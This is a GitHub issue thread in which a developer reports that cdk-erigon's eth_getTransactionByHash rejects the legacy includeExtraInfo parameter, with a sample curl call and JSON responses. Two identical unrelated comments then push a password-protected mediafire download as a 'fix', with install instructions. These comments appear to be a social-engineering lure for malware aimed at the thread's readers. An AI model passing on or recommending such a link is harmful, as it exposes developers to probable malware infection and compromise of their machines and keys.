### ISSUE TITLE
`eth_getTransactionByHash` only supports one argument

### ISSUE THREAD

**Issue by praetoriansentry** [0xPolygon/cdk-erigon#1078]
The legacy node provides an implementation of `eth_getTransactionByHash` which supports two parameters: the hash of the transaction and an `includeExtraInfo` flag. Setting this `includeExtraInfo` flag will include an additional `l2Hash` field in the response:
![image](https://github.com/user-attachments/assets/9cf2237d-5e7b-4cf4-9962-876cd04577b4)

The implementation of this feature within the legacy node can be found here: https://github.com/0xPolygonHermez/zkevm-node/blob/741b9b06d2faf6f855109805fcc797096a8af34f/jsonrpc/endpoints_eth.go#L641-L642

This field isn't standard and I think it's causing an issue in the current version of Erigon. E.g
```bash
curl --json '{ "id": 18,"jsonrpc": "2.0","method": "eth_getTransactionByHash","params": ["0x7b2b9a46eaeb937314822fbd371027374df3a57f932c323b41cf2b265b9643ef", true] }' https://zkevm-rpc.com
```

That call returns
```json
{"jsonrpc":"2.0","id":18,"error":{"code":-32602,"message":"too many arguments, want at most 1"}}
```

The same call when made to the legacy node returns:
```json
{"jsonrpc":"2.0","id":18,"result":{"nonce":"0x30","gasPrice":"0x1ba8140","gas":"0xb4b3","to":"0xc5015b9d9161dca7e18e32f6f25c4ad850731fd4","value":"0x0","input":"0x095ea7b3000000000000000000000000f2614a233c7c3e7f08b1f887ba133a13f1eb2c550000000000000000000000000000000000000000000000000470de4df8200000","v":"0x8bd","r":"0x3f696b581be06958fa85457bec4f615d9d065e2d78586dfd9b7ef6e83ddc87de","s":"0x3a317943e5c1ad5bc8821d87a1d4083fd19313a0d91b36fb95eeaa25d10f1dc9","hash":"0x7b2b9a46eaeb937314822fbd371027374df3a57f932c323b41cf2b265b9643ef","from":"0xeeec6dcedfe42e5ff150d0165c816106c4633ac2","blockHash":"0x574ce989f6ec9c85afbbb1f102751f13c02c2c4c41ec338dd0bf6d14009fe221","blockNumber":"0xed9e4a","transactionIndex":"0x0","chainId":"0x44d","type":"0x0","l2Hash":"0x5926f4ee094f2f3d4be18eccf600eb36994a9f0e94d6973d7751d9277f517c3a"}}
```

Given that this is the same error as reported in issue #1077 - this _might_ be the root cause.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
